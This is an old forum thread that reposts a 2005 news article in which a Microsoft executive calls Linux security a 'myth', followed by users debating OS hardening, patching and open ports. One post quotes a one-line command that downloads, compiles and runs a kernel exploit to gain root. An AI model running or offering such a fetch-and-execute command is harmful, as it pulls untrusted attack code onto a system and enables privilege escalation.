Linux security is a "myth", claims Microsoft

[hismajesty]

I like Microsoft and most of their products, but I'm not at fanboy status thankfully. Microsofts comments are absurd, though, imho.

Linux security is a 'myth', claims Microsoft
Open source OS 'not ready for mission-critical computing'
Robert Jaques, vnunet.com 28 Jan 2005
ADVERTISEMENT

A senior Microsoft executive, speaking exclusively to vnunet.com, has dismissed Linux's reputation as a secure platform as a "myth", claiming that the open source development process creates fundamental security problems.

Nick McGrath, head of platform strategy for Microsoft in the UK, said that the myths surrounding the open source operating system are rapidly being exploded, and that customers are dismissing Linux as too immature to cope with mission-critical computing.

"The biggest challenge we need to face centres on the myth and reality. There are lots of myths out there as to what Linux can do. One myth we see is that Linux is more secure than Windows. Another is that there are no viruses for Linux," said McGrath.

"Who is accountable for the security of the Linux kernel? Does Red Hat, for example, take responsibility? It cannot, as it does not produce the Linux kernel. It produces one distribution of Linux.

"In Microsoft's world customers are confidant that we take responsibility. They know that they will get their upgrades and patches."

McGrath went on to claim that another Linux myth centres on the number of open source developers who work to create the operating system.

"There a myth in the market that there are hundreds of thousands of people writing code for the Linux kernel. This is not the case; the number is hundreds, not thousands," he said.

"If you look at the number of people who contribute to the kernel tree, you see that a significant amount of the work is just done by a handful.

"There are very few of the improvements that come through the wider community. There are more skilled developers writing for the Microsoft platform than for open source.

"The way that 2004 started off there were a lot of myths in the marketplace around the cost and capability of Linux. But now a lot of the ideology has been replaced with commercial reality."

McGrath argued that recent growth in Linux deployments came largely at the expense of installed Unix systems, rather than replacement of Windows servers.

"We are increasingly seeing that the biggest challenges in the marketplace are less for Microsoft and more in the Unix space. Customers are moving away from Risc to Intel as the price performance ratio is compelling," he said.

"A lot of the percentage growth figures mask the fact that Linux is coming from a very small base. There are more Unix servers than Linux servers in the UK. There are more Windows servers than Linux servers in the UK."

The credibility of Linux in the enterprise is beginning to suffer, according to McGrath, as companies complete trials and find the platform wanting.

"A lot of customers have got trials and pilots of Linux, but are holding back Linux deployment into the mainstream because the operating system does not have the solution stack that they were expecting," he said.

"Most customers look for more than just a product from their vendors. They need a solution that comes with the appropriate levels of support and service. This is where Linux is becoming more challenged as people expect more from Linux.

"Linux is not ready for mission-critical computing. There are fundamental things missing. For example, there is no single development environment for Linux as there is for Microsoft, neither is there a single sign-on system.

"There are bits of the Linux software stack that are missing. These are factors that are holding back Linux."

http://www.vnunet.com/news/1160853

Discuss.

[Newby]

I used to think Linux was super secure.

Then, my friend rooted me with one command. :/

"wget <url>/d.c && gcc -O2 d.c -o a.out && ./a.out"

[Arta]

Well, that's probably your fault, not linux's - nothing is 'super secure' independent of people.

As for the article: Classic FUD.

[Newby]

It was "the latest kernel exploit", according to the person who supplied him the source code.

And my kernel was out of date at the time, so eh?

[Kp]

So then it was your own fault for not keeping up with kernel patches.  Windows has had its share of kernel vulnerabilities too, and I'm quite sure he could've exploited one of those against you if he had permission to run stuff on your Windows box.  The only guards against kernel vulnerabilities are: 1) keeping your kernel patched up to prevent it and 2) not allowing untrustworthy people permission to run programs on your system!

As for the article: silly in the extreme.  Single sign-on has always seemed like a bad idea to me, so I consider it rather valuable that Linux lacks it.  Also, I like his claim that Microsoft takes responsibility for their stuff.  That must be why their EULAs (like all EULAs, actually) disclaim that the makers have any liability for anything whatsoever that might or might not happen as a result of your use of their software.

[Arta]

Just about every license disclaims liability. Interestingly, many of those license are unenforceable here in the UK, because you can't disclaim all liability

[Kp]

Just about every license disclaims liability.

Sure, and given how U.S. courts work it definitely makes sense for authors selling over here to do that.  My point was how silly it is for him to claim Microsoft takes responsibility for anything when they disclaim all liability, charge for any support, regularly need to issue critical security updates (sometimes weeks after disclosure), etc.

[quasi-modo]

Linux will always be inherently more secrue because of it's setup in which the normal files are separate from the os files. Until ms adopts something more like that linux will always have a leg up on them.

[iago]

on Linux, if I don't want any ports open, I disable all services (ssh, telnet, ftp, etc.).  Then I have 0 ports open.  Good luck remotely exploiting that.

on Windows, if I don't want any ports open, I have to buy a firewall. 

[Adron]

on Linux, if I don't want any ports open, I disable all services (ssh, telnet, ftp, etc.).  Then I have 0 ports open.  Good luck remotely exploiting that.

on Windows, if I don't want any ports open, I have to buy a firewall. 

Overflows in the IP stack itself or in the firewall can still be exploited. I think there has been exploits available that didn't require any open ports?

[dxoigmn]

on Windows, if I don't want any ports open, I have to buy a firewall. 

I don't have a firewall and I have no unwanted ports open (only 3389 which is for Remote Desktop since I use it often when going to CS labs) on Windows XP.  Easy enough to accomplish.

[iago]

Adron - I thought of that, but shh. 

How do you close 135/139/445/`1025/etc?  I could never find out how

[dxoigmn]

Adron - I thought of that, but shh. 

How do you close 135/139/445/`1025/etc?  I could never find out how

Turn off DCOM (registry), Netbios (TCP/IP Configuration), and remove TransportBindName (registry).  Everything can be turned off it's just a matter of searching for it.  It may not be as easy as linux but it can be done.

[quasi-modo]

I know plenty of people who are sysadmins over linux and win servers. How secure the server is just depends on how competent the admin is. An new admin who does not know what he is doing can have his systems exploited no matter what os there is. If the admin knows what he is doing windows is pretty secure. My one problem with windows, as said before, is that the os files are mixed in with everything else. If a hacker can get in then they can really mess things up.

[tA-Kane]

My one problem with windows, as said before, is that the os files are mixed in with everything else. If a hacker can get in then they can really mess things up.

If the non-admin programs aren't allowed to move, change, delete, or even access the system files, then what vulnerability is there?